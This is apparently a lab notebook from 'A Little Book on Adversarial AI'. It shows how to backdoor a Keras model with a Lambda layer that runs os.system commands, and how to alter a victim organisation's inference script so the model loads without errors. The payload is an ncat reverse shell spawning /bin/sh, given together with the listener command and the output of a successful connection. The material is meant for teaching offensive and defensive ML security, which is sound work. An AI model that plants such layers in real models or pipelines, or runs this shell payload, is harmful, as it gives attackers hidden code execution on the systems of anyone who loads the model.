<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(attacking_lambda_layers_cmd.ipynb)*** is part of the series of notebooks From ***A Little Book on Adversarial AI***  A free ebook released by Nik Alleyne

**Building on Lambda**     
***Attacking_Lambda_Layers.ipynb**  

- Assuming we have stolen or gained access to the script used to load the model and make prediction ...

### Lab Objectives:   
- Build on our learning about Keras Lambda layer   
- Learn how we can attach malicious code to a model using the Lambda layer    
- Learn how to use *@keras.saving.register_keras_serializable()* decorator   
- Learn how to manipulate an organization's inference script  


### Step 1:  

The base script which the organization uses to make predictions is **tf_make_predictions_base_script.py**

**Note!** Copy this to a python file and run it from the command line. Let's say we gained access to the script file: **tf_make_predictions_base_script.py**     

Open a terminal and run the script   
**Do not run it from within this notebook**    

If you run it from this notebook, it will still give you the error but this is not what we want. The organization is more than likely not running their code through Jupyter but instead as a script outside of Jupyter.  When the organization tries to run our model, it will fail

In [6]:
# Remember to run this from your command line.  
# This is the organization running their script
# This script fails as shown below

!python tf_make_predictions_base_script.py --model /tmp/zeek_pwnd.keras --data "[[0.5, 0.2, 0.1, 0.3, 0.4, 0.2, 0.5]]"

2025-08-01 20:42:53.926783: I tensorflow/core/util/port.cc:153] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.
2025-08-01 20:42:53.947408: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:467] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered
E0000 00:00:1754095373.982762    7976 cuda_dnn.cc:8579] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered
E0000 00:00:1754095373.994905    7976 cuda_blas.cc:1407] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered
W0000 00:00:1754095374.026836    7976 computation_placer.cc:177] computation placer already registered. Please check linkage and avoid linking 

**Your error should look something like:**   
*config={'module': 'keras.layers', 'class_name': 'Lambda', 'config': {'name': 'malicious_layer', 'trainable': True, 'dtype': {'module': 'keras', 'class_name': 'DTypePolicy', 'config': {'name': 'float32'}, 'registered_name': None}, 'function': {'module': 'builtins', 'class_name': 'function', 'config': 'malicious_payload>malicious_payload', 'registered_name': 'function'}, 'arguments': {'command': 'pwd'}}, 'registered_name': None, 'build_config': {'input_shape': [None, 1]}}.*

*Exception encountered: Could not locate function 'malicious_payload>malicious_payload'. Make sure custom classes are decorated with `@keras.saving.register_keras_serializable()`. Full object config: {'module': 'builtins', 'class_name': 'function', 'config': 'malicious_payload>malicious_payload', 'registered_name': 'function'}*

We don't wish for the organization to get this error when they run their model via the script, obviously they will recognize there is a problem here. 


Let us now modify the organization base script  
We will give the modified script a different name
All we need to do, is copy our malicious function into the script and modify the arguments if we wish. 
We will do it two ways. Let's us set a default argument that allows it to setup a reverse shell
and the second way, YoU if you wish can add another argument that allows you to run any command you would like via the model 

**Note:** Remember to setup your listener on your remote host before running this script
**ncat --verbose --listen 9999 --ssl**

- In the previous lab, we used command as {'command' : 'pwd' }   
- Let's give it our shell as the default.
    **{'command' : 'ncat --verbose 127.0.0.1 9999 --exec /bin/sh --ssl &'}**

- Do you remember seeing this line in the previous lab? This is what we will be using   
**malicious_layer = tf.keras.layers.Lambda(function=malicious_payload, name='malicious_layer', arguments={'command' : 'ncat --verbose 127.0.0.1 9999 --exec /bin/sh --ssl &'})**

Now let's modify the base script and rename it to:  
**tf_make_predictions_pwnd_script_lambda.py**   


Time to get our model  

### Step 2:  

In [7]:
# Import tensorflow
import tensorflow as tf

In [8]:
# On my system, there is a compatibility issue between my Cuda and Tensorflow
# As a result I disable the GPU by default for Tensorflow.
# If Tensorflow is working fine on your system, then feel free to comment out the lines below

# Comment out this line if your GPU works fine in Tensorflow 
print(f'[-] Disabling the GPU')
tf.config.set_visible_devices(devices=[], device_type='GPU')

print(f'[*] Current logical devices: {tf.config.list_logical_devices()}')
print(f'[*] Current physical devices: {tf.config.list_physical_devices(device_type='GPU')}')

[-] Disabling the GPU
[*] Current logical devices: [LogicalDevice(name='/device:CPU:0', device_type='CPU')]
[*] Current physical devices: [PhysicalDevice(name='/physical_device:GPU:0', device_type='GPU')]


In [9]:
### Version of key libraries used  
print(f'Tensorflow version used:  {tf.__version__}')

Tensorflow version used:  2.19.0


In [10]:
# Load the victim model .. again
loaded_model = tf.keras.models.load_model(filepath='/tmp/zeek_model.keras')
loaded_model

<Sequential name=simple_model, built=True>

We the model in place, time to register our custom object and at the same time create our malicious function and add the lambda layer. 


### Step 3:

In [11]:
# Define a function to use with the lambda layer
# If there were any previously registered custom objects, we can clear any previously registered custom objects as follow
tf.keras.utils.get_custom_objects().clear()

# To ensure this function is properly registered when saving the model, let's add this decorator
# I made a small change to the name by adding the _cmd to the package and name. 
# We need unique layer names in the model

@tf.keras.utils.register_keras_serializable(package="malicious_payload_cmd", name="malicious_payload_cmd")
def malicious_payload(incoming_tensor, command):
    '''
    Lambda layer requires a function.
    Args:
        incoming_tensor (tensor): This is the tensor coming from the previous layer. 
                         We will not modify this. This should pass through
        command (str):  The command we wish to execute
    '''
    # Import os because we would like the function to be self contained
    import os

    # Execute the command passed
    os.system(command)
    return incoming_tensor

#malicious_payload()

In [12]:
# Define he malicious lambda layer
# Lambda layer: https://keras.io/api/layers/core_layers/lambda/

# In the next run, we will use this. For now, stick with the line above
# change the name again to add *_cmd*
malicious_layer = tf.keras.layers.Lambda(function=malicious_payload, name='malicious_layer_cmd', arguments={'command' : 'ncat --verbose 127.0.0.1 9999 --exec /bin/sh --ssl &'})

malicious_layer

<Lambda name=malicious_layer_cmd, built=False>

In [13]:
'''
Modify the stolen model
Add the malicious layer to the pretrained model
We also see the results printed from our command. 
'''
# You should already have a connection here
loaded_model.add(malicious_layer)

Ncat: Version 7.94SVN ( https://nmap.org/ncat )


In [14]:
# Save the compromised model to be accessed via the cmd
tf.keras.models.save_model(model=loaded_model, filepath=r'/tmp/zeek_pwnd_cmd.keras', overwrite=True)

Ncat: Subject: CN=localhost
Ncat: Issuer: CN=localhost
Ncat: SHA-1 fingerprint: CD8F C079 7523 F3A7 FE61 F95C 9B78 0A97 D838 7E6D
Ncat: Certificate verification failed (self-signed certificate).
Ncat: SSL connection to 127.0.0.1:9999.
Ncat: SHA-1 fingerprint: CD8F C079 7523 F3A7 FE61 F95C 9B78 0A97 D838 7E6D


### Lab Takeaways:  
- We were able to build on what we previously learned about lambda layers  
- We modified the inference script. 
- We still, however, has lots more work to do.  